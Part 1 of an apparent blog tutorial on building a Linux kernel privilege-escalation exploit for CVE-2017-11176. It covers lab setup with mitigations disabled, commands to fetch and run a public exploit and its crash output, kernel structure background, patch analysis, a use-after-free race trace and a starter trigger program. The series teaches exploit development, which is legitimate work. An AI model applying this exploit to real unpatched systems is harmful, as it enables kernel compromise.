This series covers a step-by-step walkthrough to develop a Linux kernel exploit from a CVE description. It starts with the patch analysis to understand the bug and trigger it from kernel land (part 1), then it gradually builds a working proof-of-concept code (part 2). The PoC is then turned into an arbitrary call primitive (part 3) which is finally used to execute arbitrary code in ring-0 (part 4).
The targeted audience is the Linux kernel newcomers (nothing too fancy for the veterans). Since most kernel exploit articles imply that the reader is already familiar with the kernel code, we will try to fill the gap by exposing core data structure and important code paths. In the end, every single line of the exploit should be understood, as well as their impact on the kernel.
While it is impossible to cover everything in a single article, we will try to unroll every kernel path needed to develop the exploit. Think of it as a guided Linux kernel tour supported by a practical example. Exploit writing is actually a good way to understand the Linux kernel. In addition, we will show some debugging techniques, tools, common pitfalls and how to fix them.
The CVE developed here is CVE-2017-11176, aka "mq_notify: double sock_put()". Most distributions patched it during the mid 2017. At the time of writing, there is no known public exploit.
The kernel code exposed here matches a specific version (v2.6.32.x), nevertheless the bug also affects kernels up to 4.11.9. One might think that this version is too old, yet it is still actually used in a lot of places and some paths might be easier to understand. It shouldn't be too hard to find the equivalent paths on a more recent kernel.
The exploit built here is not targetless. Hence, some modifications are required to run it on another target (structure offsets/layout, gadgets, function addresses...). Do not try to run the exploit as is, this will just crash your system! You can find the final exploit here.
It is recommended grabbing the source code of a vulnerable kernel and try to follow the code on the go (or even better, implement the exploit). Fire up your favorite code crawling tool and let's start!
Warning: Please do not get scared by the size of this series, there are tons of code. Anyway, if you really want to get into kernel hacking, you must be ready to read a lot of codes and documentation. Just take your time.
Note: we do not deserve any credit for this CVE discovery, it is basically a 1-day implementation.
This article only covers a small subset of the whole kernel. We recommend you to read those books (they are great!):
UPDATE: Thanks to readers feedbacks, this section has been updated (2018-10-22).
The code exposed here comes from a specific target (2.6.32.x). However, you can try to implement the exploit on the following target. There might be slight variations in the code that shouldn't be blocking.
The previous ISO runs a 3.16.36 kernel. We only confirmed that the bug is reachable and makes the kernel crash. Most of the changes will appear during the last stages of exploitation (cf. part 3 and 4).
While the bug is (mostly) exploitable in various configurations/architecture, the only requirements needed to exploit it the same way we do are:
WARNING: Due to code variation in the suggested target, it is recommended to set the number of CPU to one. Otherwise, reallocation may need additional steps (cf. part 3).
The "default" configuration on the previous ISO satisfies all of those requirements. If you want to develop the exploit on another target, please see the next section.
Do not worry if you don't know what are SLAB/SMEP/SMAP, this will be covered in part 3 and part 4.
WARNING: To ease debugging, you must run the target with a virtualization software. However, we discourage using virtualbox as it didn't support SMEP (not sure if it does right now). You can use the free version of vmware for instance or any other virtualization tool as long as it supports SMEP (we will bypass it).
Once the system has been installed (don't develop on a LiveCD), we need to check that the system configuration is as expected.
In order to know if SMEP is enabled or not, run the following command. The "smep" string MUST be present:
$ grep "smep" /proc/cpuinfo
flags : [...] smep bmi2 invpcid
^--- this one
If not, check that cat /proc/cmdline does NOT have the nosmep string. If it does, you will need to edit the /etc/default/grub file and modify the following lines:
# /etc/default/grub
GRUB_CMDLINE_LINUX_DEFAULT="quiet" // must NOT have "nosmep"
GRUB_CMDLINE_LINUX="initrd=/install/initrd.gz" // must NOT have "nosmep"
Then run update-grub and reboot your system. If this is still disabled afterward (check /proc/cpuinfo), then use another virtualization tool.
For SMAP, you will need to do the exact opposite. First, grep for "smap" in /proc/cpuinfo. If it does not appear, everything is okay. Otherwise, add "nosmap" in your grub configuration file (then update-grub and reboot).
The exploit developed here we will use "hardcoded" addresses. For this reason, kASLR must be disabled. This is the equivalent of ASLR (Address Space Layout Randomization) but for the kernel. In order to disable it, you can add the nokaslr option in the cmdline (just like nosmap). In the end, the grub cmdline should be something like:
GRUB_CMDLINE_LINUX_DEFAULT="quiet nokaslr nosmap"
GRUB_CMDLINE_LINUX="initrd=/install/initrd.gz"
Finally, your target must use the SLAB allocator. You can validate the kernel is using it with:
$ grep "CONFIG_SL.B=" /boot/config-$(uname -r)
CONFIG_SLAB=y
It must be CONFIG_SLAB=y. Debian uses SLAB by default while Ubuntu uses SLUB by default. If not, then you will need to recompile the kernel. Please read your distribution documentation.
Again, the suggested ISO satisfies all those requirements, so you only need to check that everything is okay.
As mentioned before, the ISO runs a v3.16.36 (uname -v) kernel which is vulnerable to the bug (patched in v3.16.47).
WARNING: Do NOT follow the systemtap installation procedure as it might update the kernel!
Because of this, we will need to grab the .deb package for our specific version and install them manually. We will need:
You can download them from this link, or type:
# wget https://snapshot.debian.org/archive/debian-security/20160904T172241Z/pool/updates/main/l/linux/linux-image-3.16.0-4-amd64_3.16.36-1%2Bdeb8u1_amd64.deb
# wget https://snapshot.debian.org/archive/debian-security/20160904T172241Z/pool/updates/main/l/linux/linux-image-3.16.0-4-amd64-dbg_3.16.36-1%2Bdeb8u1_amd64.deb
# wget https://snapshot.debian.org/archive/debian-security/20160904T172241Z/pool/updates/main/l/linux/linux-headers-3.16.0-4-amd64_3.16.36-1%2Bdeb8u1_amd64.deb
Then, install them with:
# dpkg -i linux-image-3.16.0-4-amd64_3.16.36-1+deb8u1_amd64.deb
# dpkg -i linux-image-3.16.0-4-amd64-dbg_3.16.36-1+deb8u1_amd64.deb
# dpkg -i linux-headers-3.16.0-4-amd64_3.16.36-1+deb8u1_amd64.deb
Once you're done, reboot the system and then download system tap with:
And finally, check that everything is fine:
# stap -v -e 'probe vfs.read {printf("read performed\n"); exit()}'
stap: Symbol `SSL_ImplementedCiphers' has different size in shared object, consider re-linking
Pass 1: parsed user script and 106 library script(s) using 87832virt/32844res/5328shr/28100data kb, in 100usr/10sys/118real ms.
Pass 2: analyzed script: 1 probe(s), 1 function(s), 3 embed(s), 0 global(s) using 202656virt/149172res/6864shr/142924data kb, in 1180usr/730sys/3789real ms.
Pass 3: translated to C into "/tmp/stapWdpIWC/stap_1390f4a5f16155a0227289d1fa3d97a4_1464_src.c" using 202656virt/149364res/7056shr/142924data kb, in 0usr/20sys/23real ms.
Pass 4: compiled C into "stap_1390f4a5f16155a0227289d1fa3d97a4_1464.ko" in 6310usr/890sys/13392real ms.
Pass 5: starting run.
read performed // <--------------
Pass 5: run completed in 10usr/20sys/309real ms.
Updated (2018-10-22)
In addition to system tap, the target kernel will be used to compile and run the exploit, so run this:
# apt install binutils gcc
Now, download the exploit with:
$ wget https://raw.githubusercontent.com/lexfo/linux/master/cve-2017-11176.c
Due to code differences between the suggested and the article targets, the "used-after-freed" object here lies in the "kmalloc-2048" cache (instead of kmalloc-1024). That is, change the following lines in the exploit:
#define KMALLOC_TARGET 2048 // instead of 1024
This is the kind of problems that arises with non-targetless exploit. You will understand this change by reading part 3. Now, build and run the exploit:
$ gcc -fpic -O0 -std=c99 -Wall -pthread cve-2017-11176.c -o exploit
$ ./exploit
[ ] -={ CVE-2017-11176 Exploit }=-
[+] successfully migrated to CPU#0
[+] userland structures allocated:
[+] g_uland_wq_elt = 0x120001000
[+] g_fake_stack = 0x20001000
[+] ROP-chain ready
[ ] optmem_max = 20480
[+] can use the 'ancillary data buffer' reallocation gadget!
[+] g_uland_wq_elt.func = 0xffffffff8107b6b8
[+] reallocation data initialized!
[ ] initializing reallocation threads, please wait...
[+] 200 reallocation threads ready!
[+] reallocation ready!
[+] 300 candidates created
[+] parsing '/proc/net/netlink' complete
[+] adjacent candidates found!
[+] netlink candidates ready:
[+] target.pid = -4590
[+] guard.pid = -4614
[ ] preparing blocking netlink socket
[+] receive buffer reduced
[ ] flooding socket
[+] flood completed
[+] blocking socket ready
[+] netlink fd duplicated (unblock_fd=403, sock_fd2=404)
[ ] creating unblock thread...
[+] unblocking thread has been created!
[ ] get ready to block
[ ][unblock] closing 576 fd
[ ][unblock] unblocking now
[+] mq_notify succeed
[ ] creating unblock thread...
[+] unblocking thread has been created!
[ ] get ready to block
[ ][unblock] closing 404 fd
[ ][unblock] unblocking now
[ 55.395645] Freeing alive netlink socket ffff88001aca5800
[+] mq_notify succeed
[+] guard socket closed
[ 60.399964] general protection fault: 0000 [#1] SMP
... cut (other crash dump info) ...
<<< HIT CTRL-C >>>
The exploit failed (and does not give root shell) because it has not been built for this target. As you will see, it requires modifications (cf. part 3 and 4). However, it validates that we can reach the bug.
WARNING: Because of other differences between our target and the suggested one, you WILL NOT get some kernel crashes (e.g. part 2). The reason being, the kernel does not automatically crash on certain error (just like above) but simply hang or kill the exploit. However, it is in a unstable state and can crash at any time. It is recommended to read the code and understand those differences.
Once the system has been installed and ready, the next step is to grab the kernel source code. Again, since we are using an outdated kernel, we will need to grab it with:
# wget https://snapshot.debian.org/archive/debian-security/20160904T172241Z/pool/updates/main/l/linux/linux-source-3.16_3.16.36-1%2Bdeb8u1_all.deb
And:
# dpkg -i linux-source-3.16_3.16.36-1+deb8u1_all.deb
The kernel source code should be located at: /usr/src/linux-source-3.16.tar.xz.
Since the target kernel will crash a lot, you must analyse the kernel code and develop the exploit from your host system. That is, get those source back to your host system. The target must only be used to compile/run the exploit and SystemTap (through ssh!).
From here, you can use any code crawling tool. It is required that you can cross-reference symbols efficiently. Linux has multiple millions lines of code, you will get lost without it.
A lot of kernel developers seems to use cscope. You can generate the cross-references by doing like this or just:
Note the -k modifier which excludes your system library headers as the kernel runs in freestanding. The cscope database generation takes a couple of minutes, then use an editor which has a plugin for it (e.g. vim, emacs).
Hopefully, you are now ready to develop your first kernel exploit.
GL&HF! :-)
In order not to get lost at the very first line of the CVE analysis, it is necessary to introduce some core concepts of the Linux kernel. Please note that most structures exposed here are incomplete in order to keep it simple.
One of the most important structures in the kernel is the struct task_struct, yet not the simplest one.
Every task has a task_struct object living in memory. A userland process is composed of at least one task. In a multi-threaded application, there is one task_struct for every thread. Kernel threads also have their own task_struct (e.g. kworker, migration).
The task_struct holds crucial information like:
// [include/linux/sched.h]
struct task_struct {
volatile long state; // process state (running, stopped, ...)
void *stack; // task's stack pointer
int prio; // process priority
struct mm_struct *mm; // memory address space
struct files_struct *files; // open file information
const struct cred *cred; // credentials
// ...
};
Accessing the current running task is such a common operation that a macro exists to get a pointer on it: current.
Everybody knows that "everything is a file", but what does it actually mean?
In the Linux kernel, there are basically seven kinds of files: regular, directory, link, character device, block device, fifo and socket. Each of them can be represented by a file descriptor. A file descriptor is basically an integer that is only meaningful for a given process. For each file descriptor, there is an associated structure: struct file.
A struct file (or file object) represents a file that has been opened. It does not necessarily match any image on the disk. For instance, think about accessing files in a pseudo-file systems like /proc. While reading a file, the system may need to keep track of the cursor. This is the kind of information stored in a struct file. Pointers to struct file are often named filp (for file pointer).
The most important fields of a struct file are:
// [include/linux/fs.h]
struct file {
loff_t f_pos; // "cursor" while reading file
atomic_long_t f_count; // object's reference counter
const struct file_operations *f_op; // virtual function table (VFT) pointer
void *private_data; // used by file "specialization"
// ...
};
The mapping which translates a file descriptor into a struct file pointer is called the file descriptor table (fdt). Note that this is not a 1:1 mapping, there could be several file descriptors pointing to the same file object. In that case, the pointed file object has its reference counter increased by one (cf. Reference Counters). The FDT is stored in a structure called: struct fdtable. This is really just an array of struct file pointers that can be indexed with a file descriptor.
// [include/linux/fdtable.h]
struct fdtable {
unsigned int max_fds;
struct file ** fd; /* current fd array */
// ...
};
What links a file descriptor table to a process is the struct files_struct. The reason why the fdtable is not directly embedded into a task_struct is that it has other information (e.g. close on exec bitmask, ...). A struct files_struct can also be shared between several threads (i.e. task_struct) and there is some optimization tricks as well.
// [include/linux/fdtable.h]
struct files_struct {
atomic_t count; // reference counter
struct fdtable *fdt; // pointer to the file descriptor table
// ...
};
A pointer to a files_struct is stored in the task_struct (field files).
While being mostly implemented in C, Linux remains an object-oriented kernel.
One way to achieve some genericity is to use a virtual function table (vft). A virtual function table is a structure which is mostly composed of function pointers.
The mostly known VFT is struct file_operations:
// [include/linux/fs.h]
struct file_operations {
ssize_t (*read) (struct file *, char __user *, size_t, loff_t *);
ssize_t (*write) (struct file *, const char __user *, size_t, loff_t *);
int (*open) (struct inode *, struct file *);
int (*release) (struct inode *, struct file *);
// ...
};
Since everything is a file but not of the same type, they all have different file operations, often called f_ops. Doing so allows the kernel code to handle file independently of their type and code factorization. It leads to such kind of code:
if (file->f_op->read)
ret = file->f_op->read(file, buf, count, pos);
A struct socket lives at the top-layer of the network stack. From a file perspective, this is the first level of specialization. During socket creation (socket() syscall), a new struct file is created and its file operation (field f_op) is set to socket_file_ops.
Since every file is represented with a file descriptor, you can use any syscall that takes a file descriptor as argument (e.g. read(), write(), close()) with a socket file descriptor. This is actually the main benefit of "everything is a file" motto. Independently of the socket's type, the kernel will invoke the generic socket file operation:
// [net/socket.c]
static const struct file_operations socket_file_ops = {
.read = sock_aio_read, // <---- calls sock->ops->recvmsg()
.write = sock_aio_write, // <---- calls sock->ops->sendmsg()
.llseek = no_llseek, // <---- returns an error
// ...
}
Since struct socket actually implements the BSD socket API (connect(), bind(), accept(), listen(), ...), they embedded a special virtual function table (vft) of type struct proto_ops. Every type of socket (e.g. AF_INET, AF_NETLINK) implements its own proto_ops.
// [include/linux/net.h]
struct proto_ops {
int (*bind) (struct socket *sock, struct sockaddr *myaddr, int sockaddr_len);
int (*connect) (struct socket *sock, struct sockaddr *vaddr, int sockaddr_len, int flags);
int (*accept) (struct socket *sock, struct socket *newsock, int flags);
// ...
}
When a BSD-style syscall is invoked (e.g. bind()), the kernel generally follows that scheme:
Because some protocol operations (e.g. sending/receiving data) might actually need to go into the lower layer of the network stack, the struct socket has a pointer to a struct sock object. This pointer is generally used by the socket protocol operations (proto_ops). In the end, a struct socket is a kind of glue between a struct file and a struct sock.
// [include/linux/net.h]
struct socket {
struct file *file;
struct sock *sk;
const struct proto_ops *ops;
// ...
};
The struct sock is a complex data structure. One might see it as a middle-ish thing between the lower layer (network card driver) and higher level (socket). Its main purpose is the ability to hold the receive/send buffers in a generic way.
When a packet is received over the network card, the driver "enqueued" the network packet into the sock receive buffer. It will stay there until a program decides to receive it (recvmsg() syscall). The other way around, when a program wants to send data (sendmsg() syscall), a network packet is "enqueued" onto the sock sending buffer. Once notified, the network card will then "dequeue" that packet and send it.
Those "network packets" are the so-called struct sk_buff (or skb). The receive/send buffers are basically a doubly-linked list of skb:
// [include/linux/sock.h]
struct sock {
int sk_rcvbuf; // theorical "max" size of the receive buffer
int sk_sndbuf; // theorical "max" size of the send buffer
atomic_t sk_rmem_alloc; // "current" size of the receive buffer
atomic_t sk_wmem_alloc; // "current" size of the send buffer
struct sk_buff_head sk_receive_queue; // head of doubly-linked list
struct sk_buff_head sk_write_queue; // head of doubly-linked list
struct socket *sk_socket;
// ...
}
As we can see, a struct sock references a struct socket (field sk_socket), while a struct socket references a struct sock (field sk). In the very same way, a struct socket references a struct file (field file) while a struct file references a struct socket (field private_data). This "2-way mechanism" allows data to go up-and-down through the network stack.
NOTE: Do not get confused! The struct sock objects are often called sk, while struct socket objects are often called sock.
Netlink socket is a type of socket (i.e. family) just like UNIX or INET sockets.
Netlink socket (AF_NETLINK) allows communication between kernel and user space. It can be used to modify the routing table (NETLINK_ROUTE protocol), to receive SELinux event notifications (NETLINK_SELINUX) and even communicate to other userland process (NETLINK_USERSOCK).
Since struct sock and struct socket are generic data structure supporting all kinds of sockets, it is necessary to somehow "specialize them" at some point.
From the socket perspective, the proto_ops field needs to be defined. For the netlink family (AF_NETLINK), the BSD-style socket operations are netlink_ops:
// [net/netlink/af_netlink.c]
static const struct proto_ops netlink_ops = {
.bind = netlink_bind,
.accept = sock_no_accept, // <--- calling accept() on netlink sockets leads to EOPNOTSUPP error
.sendmsg = netlink_sendmsg,
.recvmsg = netlink_recvmsg,
// ...
}
It gets a little bit more complicated, from the sock perspective. One might see a struct sock as an abstract class. Hence, a sock needs to be specialized. In the netlink case, this is made with struct netlink_sock:
// [include/net/netlink_sock.h]
struct netlink_sock {
/* struct sock has to be the first member of netlink_sock */
struct sock sk;
u32 pid;
u32 dst_pid;
u32 dst_group;
// ...
};
In other words, a netlink_sock is a "sock" with some additional attributes (i.e. inheritance).
The top-level comment is of utter importance. It allows the kernel to manipulate a generic struct sock without knowing its precise type. It also brings another benefit, the &netlink_sock.sk and &netlink_sock addresses aliases. Consequently, freeing the pointer &netlink_sock.sk actually frees the whole netlink_sock object. From a language theory perspective, this is how the kernel does type polymorphism whilst the C language does not have any feature for it. The netlink_sock life cycle logic can then be kept in a generic, well tested, code.
Now that core data structures have been introduced, it is time to put them all in a diagram to visualize their relationships:
READING: Each arrow represents a pointer. No line "crosses" each other. The "sock" structure is embedded inside the "netlink_sock" structure.
In order to conclude this introduction of the kernel core concepts, it is necessary to understand how the Linux kernel handles reference counters.
To reduce memory leaks in the kernel and to prevent use-after-free, most Linux data structures embed a "ref counter". The refcounter itself is represented with an atomic_t type which is basically an integer. The refcounter is only manipulated through atomic operations like:
Because there is no "smart pointer" (or operator overload stuff), the reference counter handling is done manually by the developers. It means that when an object becomes referenced by another object, its refcounter must be explicitly increased. When this reference is dropped, the refcounter must be explicitly decreased. The object is generally freed when its refcounter reaches zero.
NOTE: increasing the refcounter is often called "taking a reference", while decreasing the refcounter is called "dropping/releasing a reference".
However, if at any time, there is an imbalance (e.g. taking one reference and dropping two), there is a risk of memory corruption:
The Linux Kernel has several facilities to handle refcounters (kref, kobject) with a common interface. However, it is not systematically used and the objects we will manipulate here have their own reference counter helpers. In general, taking a reference is mostly made of "*_get()" like functions, while dropping reference are "*_put()" like functions.
In our case, each object has different helpers names:
WARNING: it can get even more confusing! For instance, skb_put() actually does not decrease any refcounter, it "pushes" data into the sk buffer! Do not assume anything about what a function does based on its name, check it.
Now that every data structure required to understand the bug has been introduced, let's move on and analyze the CVE.
Before digging into the bug, let's describe the main purpose of the mq_notify() syscall. As stated by the man, "mq_*" stands for "POSIX message queues" and comes as a replacement for legacy System V message queues:
POSIX message queues allow processes to exchange data in the form of messages.
This API is distinct from that provided by System V message queues (msgget(2),
msgsnd(2), msgrcv(2), etc.), but provides similar functionality.
The mq_notify() syscall itself is used to register/unregister for asynchronous notifications.
mq_notify() allows the calling process to register or unregister for delivery of an
asynchronous notification when a new message arrives on the empty message queue
referred to by the descriptor mqdes.
When studying a CVE, it is always good to start with the description and the patch that corrects it.
Themq_notifyfunction in the Linux kernel through 4.11.9 does not setthe sock pointerto NULL upon entry into theretry logic. During a user-space close of aNetlink socket, it allows attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact (ring-0 take over?).
The patch is available here:
diff --git a/ipc/mqueue.c b/ipc/mqueue.c
index c9ff943..eb1391b 100644
--- a/ipc/mqueue.c
+++ b/ipc/mqueue.c
@@ -1270,8 +1270,10 @@ retry:
timeo = MAX_SCHEDULE_TIMEOUT;
ret = netlink_attachskb(sock, nc, &timeo, NULL);
- if (ret == 1)
+ if (ret == 1) {
+ sock = NULL;
goto retry;
+ }
if (ret) {
sock = NULL;
nc = NULL;
That is a one line patch! Easy enough...
Finally, the patch description provides a lot of helpful information to understand the bug:
mqueue: fix a use-after-free in sys_mq_notify()
The retry logic for netlink_attachskb() inside sys_mq_notify()
is nasty and vulnerable:
1) The sock refcnt is already released when retry is needed
2) The fd is controllable by user-space because we already
release the file refcnt
so we then retry but the fd has been just closed by user-space
during this small window, we end up calling netlink_detachskb()
on the error path which releases the sock again, later when
the user-space closes this socket a use-after-free could be
triggered.
Setting 'sock' to NULL here should be sufficient to fix it
There is only a single mistake in the patch description: during this small window. Albeit the bug as a "racy" aspect, we will see that the window can actually be extended indefinitely in a deterministic way (cf. part 2).
The patch description above gives a lot of useful information:
Let's dig into the mq_notify() syscall implementation, especially the retry logic part (i.e. retry label), as well as, the exit path (i.e. out label):
// from [ipc/mqueue.c]
SYSCALL_DEFINE2(mq_notify, mqd_t, mqdes,
const struct sigevent __user *, u_notification)
{
int ret;
struct file *filp;
struct sock *sock;
struct sigevent notification;
struct sk_buff *nc;
// ... cut (copy userland data to kernel + skb allocation) ...
sock = NULL;
retry:
[0] filp = fget(notification.sigev_signo);
if (!filp) {
ret = -EBADF;
[1] goto out;
}
[2a] sock = netlink_getsockbyfilp(filp);
[2b] fput(filp);
if (IS_ERR(sock)) {
ret = PTR_ERR(sock);
sock = NULL;
[3] goto out;
}
timeo = MAX_SCHEDULE_TIMEOUT;
[4] ret = netlink_attachskb(sock, nc, &timeo, NULL);
if (ret == 1)
[5a] goto retry;
if (ret) {
sock = NULL;
nc = NULL;
[5b] goto out;
}
[5c] // ... cut (normal path) ...
out:
if (sock) {
netlink_detachskb(sock, nc);
} else if (nc) {
dev_kfree_skb(nc);
}
return ret;
}
The previous code begins by taking a reference on a struct file object based on a user provided file descriptor [0]. If such fd does not exist in the current process file descriptor table (fdt), a NULL pointer is returned and the code goes into the exit path [1].
Otherwise, a reference is taken on the struct sock object associated to that file [2a]. If there is no valid struct sock object associated (not existent or bad type), the pointer to sock is reset to NULL and the code goes into the exit path [3]. In both cases, the previous struct file reference is dropped [2b].
Finally, there is a call to netlink_attachskb() [4] which tries to enqueue a struct sk_buff (nc) to a struct sock receive queue. From there, there is three possible outcomes:
To answer this question, let's ask ourselves: what will happen if it is not NULL? The response is:
out:
if (sock) {
netlink_detachskb(sock, nc); // <----- here
}
// from [net/netlink/af_netlink.c]
void netlink_detachskb(struct sock *sk, struct sk_buff *skb)
{
kfree_skb(skb);
sock_put(sk); // <----- here
}
// from [include/net/sock.h]
/* Ungrab socket and destroy it if it was the last reference. */
static inline void sock_put(struct sock *sk)
{
if (atomic_dec_and_test(&sk->sk_refcnt)) // <----- here
sk_free(sk);
}
In other words, if sock is not NULL during the exit path, its reference counter (sk_refcnt) will be unconditionally decreased by 1.
As the patch stated, there is an issue with the refcounting on the sock object. But where is this refcounting initially incremented? If we look at the netlink_getsockbyfilp() code (called in [2a] in previous listing), we have:
// from [net/netlink/af_netlink.c]
struct sock *netlink_getsockbyfilp(struct file *filp)
{
struct inode *inode = filp->f_path.dentry->d_inode;
struct sock *sock;
if (!S_ISSOCK(inode->i_mode))
return ERR_PTR(-ENOTSOCK);
sock = SOCKET_I(inode)->sk;
if (sock->sk_family != AF_NETLINK)
return ERR_PTR(-EINVAL);
[0] sock_hold(sock); // <----- here
return sock;
}
// from [include/net/sock.h]
static inline void sock_hold(struct sock *sk)
{
atomic_inc(&sk->sk_refcnt); // <------ here
}
So, the sock object's refcounter is incremented [0] very early in the retry logic.
Since the counter is unconditionally incremented by netlink_getsockbyfilp(), and decremented by netlink_detachskb() (if sock is not NULL). It means that netlink_attachskb() should somehow be neutral regarding refcounter.
Here is a simplified version of the netlink_attachskb() code:
// from [net/netlink/af_netlink.c]
/*
* Attach a skb to a netlink socket.
* The caller must hold a reference to the destination socket. On error, the
* reference is dropped. The skb is not sent to the destination, just all
* all error checks are performed and memory in the queue is reserved.
* Return values:
* < 0: error. skb freed, reference to sock dropped.
* 0: continue
* 1: repeat lookup - reference dropped while waiting for socket memory.
*/
int netlink_attachskb(struct sock *sk, struct sk_buff *skb,
long *timeo, struct sock *ssk)
{
struct netlink_sock *nlk;
nlk = nlk_sk(sk);
if (atomic_read(&sk->sk_rmem_alloc) > sk->sk_rcvbuf || test_bit(0, &nlk->state)) {
// ... cut (wait until some conditions) ...
sock_put(sk); // <----- refcnt decremented here
if (signal_pending(current)) {
kfree_skb(skb);
return sock_intr_errno(*timeo); // <----- "error" path
}
return 1; // <----- "retry" path
}
skb_set_owner_r(skb, sk); // <----- "normal" path
return 0;
}
Function netlink_attachskb() has basically two paths:
As the top-commentary says: The caller must hold a reference to the destination socket. On error, the reference is dropped. Yes, netlink_attachskb() has a side-effect on sock refcounter!
Since, netlink_attachskb() may release a refcounter (only one was taken with netlink_getsockbyfilp()), it is the caller responsibility not to release it a second time. This is achieved by setting sock to NULL! This is properly done on the "error" path (netlink_attachskb() returns negative value), but not on the "retry" path (netlink_attachskb() returns 1) and this is what the patch is all about.
So far, we now know what is wrong with the sock variable refcounting (it is released a second time under certain conditions), as well as, the retry logic (it does not reset sock to NULL).
The patch mentioned something about a "small window" (i.e. race condition) related to a "closed fd" stuff. Why?
Let's look again at the very beginning of the retry path:
sock = NULL; // <----- first loop only
retry:
filp = fget(notification.sigev_signo);
if (!filp) {
ret = -EBADF;
goto out; // <----- what about this?
}
sock = netlink_getsockbyfilp(filp);
This error handling path might look innocent during the first loop. But, remember, during the second loop (i.e. after "goto retry"), sock is not NULL anymore (and a ref has been already dropped). So, it directly jumps to "out", and hits the first condition...
out:
if (sock) {
netlink_detachskb(sock, nc);
}
...sock's refcounter is decremented a second time! This is a double sock_put() bug.
One might wonder why we would hit this condition (fget() returns NULL) during the second loop since it was not true during the first loop. This is the race condition aspect of that bug. We will see how to do it in the next section.
Assuming a file descriptor table can be shared between two threads, consider the following sequence:
Thread-1 | Thread-2 | file refcnt | sock refcnt | sock ptr |
------------------------------------+-----------------------+-------------+-------------+--------------------+
mq_notify() | | 1 | 1 | NULL |
| | | | |
fget(<TARGET_FD>) -> ok | | 2 (+1) | 1 | NULL |
| | | | |
netlink_getsockbyfilp() -> ok | | 2 | 2 (+1) | 0xffffffc0aabbccdd |
| | | | |
fput(<TARGET_FD>) -> ok | | 1 (-1) | 2 | 0xffffffc0aabbccdd |
| | | | |
netlink_attachskb() -> returns 1 | | 1 | 1 (-1) | 0xffffffc0aabbccdd |
| | | | |
| close(<TARGET_FD>) | 0 (-1) | 0 (-1) | 0xffffffc0aabbccdd |
| | | | |
goto retry | | FREE | FREE | 0xffffffc0aabbccdd |
| | | | |
fget(<TARGET_FD) -> returns NULL | | FREE | FREE | 0xffffffc0aabbccdd |
| | | | |
goto out | | FREE | FREE | 0xffffffc0aabbccdd |
| | | | |
netlink_detachskb() -> UAF! | | FREE | (-1) in UAF | 0xffffffc0aabbccdd |
The close(TARGET_FD) syscall invokes fput() (which decreases the reference counter of a struct file object by one) and removes the mapping from the given file descriptor (TARGET_FD) to the referenced file. That is, is the set fdt[TARGET_FD] entry to NULL. Since calling close(TARGET_FD) released the last reference of its associated struct file, it will be freed.
Since the struct file is freed, it drops the reference to its associated struct sock (i.e. refcounter will be decreased by one). Again, since the sock refcounter also hits zero, it is freed. At this time, the sock pointer is a dangling pointer which has not been reset to NULL.
The second call to fget() will fail (the fd does not point to any valid struct file in the FDT) and directly jump to "out" label. Then netlink_detachskb() will be called with a pointer to freed data, which causes a use-after-free!
Again, the use-after-free is the consequence, not the bug.
This is why the patch mentioned a "closed fd" thing. It is a necessary condition to actually trigger the bug. And because the close() happens at a very specific time in another thread, it is a "race".
So far, we've got everything needed to understand the bug and how to trigger it. We need to satisfy two conditions:
In other words, when we return from the mq_notify() syscall, the sock's refcounter has been decremented by one and we created an imbalance. Because the sock refcounter was set to one before entering mq_notify(), it is used after being freed by the end of the syscall (in netlink_detachskb()).
In the previous section, we analyzed the bug and designed an attack scenario to trigger it. In this section, we will see how we can reach the vulnerable code (that is the retry label) and start coding the exploit.
In fact, before implementing anything, one must check that the bug is a priori exploitable. If we can't even reach the vulnerable code path (because of security checks) there is no reason to continue.
Like most system calls, mq_notify starts by making a local copy of userland data using copy_from_user() function:
SYSCALL_DEFINE2(mq_notify, mqd_t, mqdes,
const struct sigevent __user *, u_notification)
{
int ret;
struct file *filp;
struct sock *sock;
struct inode *inode;
struct sigevent notification;
struct mqueue_inode_info *info;
struct sk_buff *nc;
[0] if (u_notification) {
[1] if (copy_from_user(¬ification, u_notification,
sizeof(struct sigevent)))
return -EFAULT;
}
audit_mq_notify(mqdes, u_notification ? ¬ification : NULL); // <--- you can ignore this
The code checks that the userland provided argument u_notification is not NULL [0] and uses it to make a local copy into [1] kernel memory (notification).
Next, we see a series of sanity checks based on the userland-provided struct sigevent:
nc = NULL;
sock = NULL;
[2] if (u_notification != NULL) {
[3a] if (unlikely(notification.sigev_notify != SIGEV_NONE &&
notification.sigev_notify != SIGEV_SIGNAL &&
notification.sigev_notify != SIGEV_THREAD))
return -EINVAL;
[3b] if (notification.sigev_notify == SIGEV_SIGNAL &&
!valid_signal(notification.sigev_signo)) {
return -EINVAL;
}
[3c] if (notification.sigev_notify == SIGEV_THREAD) {
long timeo;
/* create the notify skb */
nc = alloc_skb(NOTIFY_COOKIE_LEN, GFP_KERNEL);
if (!nc) {
ret = -ENOMEM;
goto out;
}
[4] if (copy_from_user(nc->data,
notification.sigev_value.sival_ptr,
NOTIFY_COOKIE_LEN)) {
ret = -EFAULT;
goto out;
}
/* TODO: add a header? */
skb_put(nc, NOTIFY_COOKIE_LEN);
/* and attach it to the socket */
retry: // <---- we want to reach this!
filp = fget(notification.sigev_signo);
If the provided argument is non-NULL [2], the sigev_notify value is checked three times ([3a], [3b], [3c]). Another copy_from_user() is invoked at [4] based on the user-provided notification.sigev_value_sival_ptr value. This needs to point to a valid userland readable data/buffer, otherwise copy_from_user() will fail.
As a reminder, the struct sigevent is declared here:
// [include/asm-generic/siginfo.h]
typedef union sigval {
int sival_int;
void __user *sival_ptr;
} sigval_t;
typedef struct sigevent {
sigval_t sigev_value;
int sigev_signo;
int sigev_notify;
union {
int _pad[SIGEV_PAD_SIZE];
int _tid;
struct {
void (*_function)(sigval_t);
void *_attribute; /* really pthread_attr_t */
} _sigev_thread;
} _sigev_un;
} sigevent_t;
In the end, to enter the retry path at least once, we need to proceed as follows:
Let's start coding the exploit and validate that everything is fine.
/*
* CVE-2017-11176 Exploit.
*/
#include <mqueue.h>
#include <stdio.h>
#include <string.h>
#define NOTIFY_COOKIE_LEN (32)
int main(void)
{
struct sigevent sigev;
char sival_buffer[NOTIFY_COOKIE_LEN];
printf("-={ CVE-2017-11176 Exploit }=-\n");
// initialize the sigevent structure
memset(&sigev, 0, sizeof(sigev));
sigev.sigev_notify = SIGEV_THREAD;
sigev.sigev_value.sival_ptr = sival_buffer;
if (mq_notify((mqd_t)-1, &sigev))
{
perror("mqnotify");
goto fail;
}
printf("mqnotify succeed\n");
// TODO: exploit
return 0;
fail:
printf("exploit failed!\n");
return -1;
}
